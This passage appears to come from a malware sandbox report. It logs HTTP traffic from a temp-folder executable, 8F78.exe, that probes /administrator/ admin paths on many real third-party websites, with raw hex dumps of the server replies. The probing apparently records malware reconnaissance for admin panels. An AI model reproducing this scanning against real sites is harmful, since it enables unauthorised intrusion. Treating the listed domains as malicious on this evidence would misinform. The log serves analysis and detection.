                                                                                                                                                                                                                                                                                                                                Keep-Alive: timeout=15
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:21 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                Data Raw: 31 37 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f c3 30 0c be ef 57 98 70 4e b3 32 0e 5b d7 ee c0 36 09 a4 f1 10 14 01 c7 d0 ba 6b 44 9a 94 d4 a3 1b bf 9e b4 e3 2d c4 c9 4e f4 3d ec cf f1 c1 e2 72 9e 3e 5c 2d a1 a4 4a c3 d5 ed c9 ea 6c 0e 8c 0b 71 37 9a 0b b1 48 17 70 7f 9a 9e af 20 0c 86 90 3a 69 1a 45 ca 1a a9 85 58 5e b0 01 2b 89 ea 48 88 b6 6d 83 76 14 58 b7 16 e9 b5 d8 76 5a 61 47 7e 6f 39 7d 63 06 39 e5 6c 36 88 7b 43 2d cd 3a 61 68 18 6c 2b 1d fd 78 99 26 f9 43 3e 9c 4c 26 7b 55 af 01 71 89 32 f7 15 62 52 a4 b1 eb 60 e9 9c 75 70 3c 3c 06 0e 17 96 a0 b0 1b 93 77 10 f1 89 89 2b 24 09 99 35 84 86 12 46 b8 25 d1 8d 33 85 ac 94 ae 41 4a 36 54 f0 31 f3 a1 50 cd f1 79 a3 5e 12 36 df c3 79 ba ab b1 f3 86 5f 2a c6 f2 4c 66 25 fe 64 f5 5f bc b3 72 56 f7 23 8b f7 99 e3 47 9b ef a0 a1 9d c6 84 15 1e c0 0b 59 29 bd 8b a4 53 52 4f f7 16 65 f8 81 c8 ac b6 2e 3a 1c ca d1 d1 38 9b f6 f8 46 bd 62 e4 0f 83 d5 1e fd cf ea 65 d8 4f 5c 7f a8 7d f1 87 c1 f8 93 bf 50 08 fe 20 b8 c6 47 34 08 37 a8 08 e1 c9 1a 9f 13 18 95 95 04 6b 2c 7c 9a 68 a0 45 e7 4b d0 e7 5a 7b ed 58 74 eb f8 b3 f6 41 ce 06 6f 0c cc 0d 5b 59 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 173}QKO0WpN2[6kD-N=r>\-Jlq7Hp :iEX^+HmvXvZaG~o9}c9l6{C-:ahl+x&C>L&{Uq2bR`up<<w+$5F%3AJ6T1Py^6y_*Lf%d_rV#GY)SROe.:8FbeO\}P G47k,|hEKZ{XtAo[Y0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:22.045831919 CET224OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: elossa.de
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Referer: http://elossa.de/administrator/
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:22.289998055 CET587INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Keep-Alive: timeout=15
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:22 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                Data Raw: 31 37 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f c3 30 0c be ef 57 98 70 4e b3 32 0e 5b d7 ee c0 36 09 a4 f1 10 14 01 c7 d0 ba 6b 44 9a 94 d4 a3 1b bf 9e b4 e3 2d c4 c9 4e f4 3d ec cf f1 c1 e2 72 9e 3e 5c 2d a1 a4 4a c3 d5 ed c9 ea 6c 0e 8c 0b 71 37 9a 0b b1 48 17 70 7f 9a 9e af 20 0c 86 90 3a 69 1a 45 ca 1a a9 85 58 5e b0 01 2b 89 ea 48 88 b6 6d 83 76 14 58 b7 16 e9 b5 d8 76 5a 61 47 7e 6f 39 7d 63 06 39 e5 6c 36 88 7b 43 2d cd 3a 61 68 18 6c 2b 1d fd 78 99 26 f9 43 3e 9c 4c 26 7b 55 af 01 71 89 32 f7 15 62 52 a4 b1 eb 60 e9 9c 75 70 3c 3c 06 0e 17 96 a0 b0 1b 93 77 10 f1 89 89 2b 24 09 99 35 84 86 12 46 b8 25 d1 8d 33 85 ac 94 ae 41 4a 36 54 f0 31 f3 a1 50 cd f1 79 a3 5e 12 36 df c3 79 ba ab b1 f3 86 5f 2a c6 f2 4c 66 25 fe 64 f5 5f bc b3 72 56 f7 23 8b f7 99 e3 47 9b ef a0 a1 9d c6 84 15 1e c0 0b 59 29 bd 8b a4 53 52 4f f7 16 65 f8 81 c8 ac b6 2e 3a 1c ca d1 d1 38 9b f6 f8 46 bd 62 e4 0f 83 d5 1e fd cf ea 65 d8 4f 5c 7f a8 7d f1 87 c1 f8 93 bf 50 08 fe 20 b8 c6 47 34 08 37 a8 08 e1 c9 1a 9f 13 18 95 95 04 6b 2c 7c 9a 68 a0 45 e7 4b d0 e7 5a 7b ed 58 74 eb f8 b3 f6 41 ce 06 6f 0c cc 0d 5b 59 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 173}QKO0WpN2[6kD-N=r>\-Jlq7Hp :iEX^+HmvXvZaG~o9}c9l6{C-:ahl+x&C>L&{Uq2bR`up<<w+$5F%3AJ6T1Py^6y_*Lf%d_rV#GY)SROe.:8FbeO\}P G47k,|hEKZ{XtAo[Y0


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                19192.168.2.45170123.239.22.202805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:21.909296036 CET175OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: aexoden.com
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:22.104477882 CET432INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:21 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Content-Length: 162
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Location: https://aexoden.com:443/administrator/
                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=15724800; includeSubdomains
                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.341914892 CET184OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: aexoden.com
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.536914110 CET441INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:27 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Content-Length: 162
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Location: https://aexoden.com:443/administrator/index.php
                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=15724800; includeSubdomains
                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                20192.168.2.45194923.239.22.202805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:22.466619968 CET175OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: aexoden.com
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:22.663364887 CET432INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:22 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Content-Length: 162
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Location: https://aexoden.com:443/administrator/
                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=15724800; includeSubdomains
                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.722623110 CET184OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: aexoden.com
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.918792963 CET441INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:27 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Content-Length: 162
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Location: https://aexoden.com:443/administrator/index.php
                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=15724800; includeSubdomains
                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                21192.168.2.451942216.230.253.85805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:22.466764927 CET182OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: e-art-studio.co.jp
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:22.669083118 CET333INHTTP/1.1 401 Unauthorized
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:22 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                WWW-Authenticate: Basic realm="Access Control Service"
                                                                                                                                                                                                                                                                                                                                Content-Length: 129
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 20 73 74 79 6c 65 3d 27 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 27 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 27 63 6f 6c 6f 72 3a 20 23 39 39 33 33 33 33 3b 27 3e 34 30 31 20 55 6e 61 75 74 68 6f 72 69 7a 65 64 3c 2f 73 70 61 6e 3e 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head></head><body><h1 style='text-align: center;'><span style='color: #993333;'>401 Unauthorized</span></h1></body></html>
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:22.716867924 CET242OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: e-art-studio.co.jp
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Referer: http://e-art-studio.co.jp/administrator/
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:22.917048931 CET333INHTTP/1.1 401 Unauthorized
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:22 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                WWW-Authenticate: Basic realm="Access Control Service"
                                                                                                                                                                                                                                                                                                                                Content-Length: 129
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 20 73 74 79 6c 65 3d 27 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 27 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 27 63 6f 6c 6f 72 3a 20 23 39 39 33 33 33 33 3b 27 3e 34 30 31 20 55 6e 61 75 74 68 6f 72 69 7a 65 64 3c 2f 73 70 61 6e 3e 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head></head><body><h1 style='text-align: center;'><span style='color: #993333;'>401 Unauthorized</span></h1></body></html>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                22192.168.2.45229881.0.206.104805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.198106050 CET176OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: izberatel.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.444874048 CET365INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:23 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Content-Length: 162
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Location: https://izberatel.sk/administrator/
                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                23192.168.2.45275681.0.206.104805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.515772104 CET176OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: izberatel.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.767314911 CET365INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:23 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Content-Length: 162
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Location: https://izberatel.sk/administrator/
                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                24192.168.2.45275546.229.230.106805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.515985012 CET179OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: eurisproagro.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.770096064 CET405INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:23 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                Content-Length: 184
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 4e bb 0e 82 30 14 dd fb 15 57 16 27 b9 f8 18 9b 0e f2 88 24 a8 0c 75 70 2c b4 09 4d 80 92 b6 92 f8 f7 52 58 1c cf fb d0 5d f6 4c f9 bb ce e1 c6 ef 15 d4 af 6b 55 a6 10 1d 10 cb 9c 17 88 19 cf 36 e5 14 27 88 f9 23 62 84 76 7e e8 19 ed 94 90 0b f0 da f7 8a 5d 92 33 14 c6 36 5a 4a 35 52 dc 48 42 71 35 d1 c6 c8 6f c8 1d d9 9f 67 41 84 4e ec 6d 3e 20 cd b8 f7 d0 89 59 c1 a4 ec a0 9d d3 66 04 6f 40 b4 ad 72 0e 50 c8 41 8f da 79 2b bc b1 48 82 d8 69 07 4e d9 59 d9 98 e2 14 b6 d6 95 a5 37 bc 23 3f 3a 85 57 0e d8 00 00 00
                                                                                                                                                                                                                                                                                                                                Data Ascii: MN0W'$up,MRX]LkU6'#bv~]36ZJ5RHBq5ogANm> Yfo@rPAy+HiNY7#?:W
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.770886898 CET236OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: eurisproagro.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Referer: http://eurisproagro.sk/administrator/
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:24.029757977 CET415INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:23 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                Content-Length: 194
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e b9 0e c2 30 10 44 7b 7f c5 42 43 45 36 1c a5 e5 02 12 04 52 38 8a 50 50 3a f1 4a b6 94 d8 96 6d 22 f8 7b 12 68 28 67 e7 ad de f0 59 71 dd d7 8f 5b 09 c7 fa 5c c1 ed be ab 4e 7b 98 2f 11 4f 65 7d 40 2c ea e2 d7 ac b3 1c b1 bc cc 05 e3 3a f5 9d e0 9a a4 1a 43 32 a9 23 b1 cd 37 70 70 a1 31 4a 91 e5 f8 3b 32 8e 5f 88 37 4e bd a7 bf 95 f8 63 c6 c4 b8 17 0f f7 04 e5 ec 22 81 96 03 81 a7 d0 9b 18 8d b3 90 1c c8 b6 a5 18 01 a5 ea 8d 35 31 05 99 5c 40 63 15 bd 32 af 3d 9b 28 6d 22 44 0a 03 85 8c a3 9f a4 5f dd 28 98 66 b2 0f 44 45 bb 81 e1 00 00 00
                                                                                                                                                                                                                                                                                                                                Data Ascii: M0D{BCE6R8PP:Jm"{h(gYq[\N{/Oe}@,:C2#7pp1J;2_7Nc"51\@c2=(m"D_(fDE


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                25192.168.2.45275992.240.253.3805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.518960953 CET176OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: eurokamen.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.776233912 CET439INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                date: Thu, 21 Dec 2023 04:03:23 GMT
                                                                                                                                                                                                                                                                                                                                location: https://eurokamen.sk/administrator/
                                                                                                                                                                                                                                                                                                                                content-length: 243
                                                                                                                                                                                                                                                                                                                                content-type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                x-bver: v2
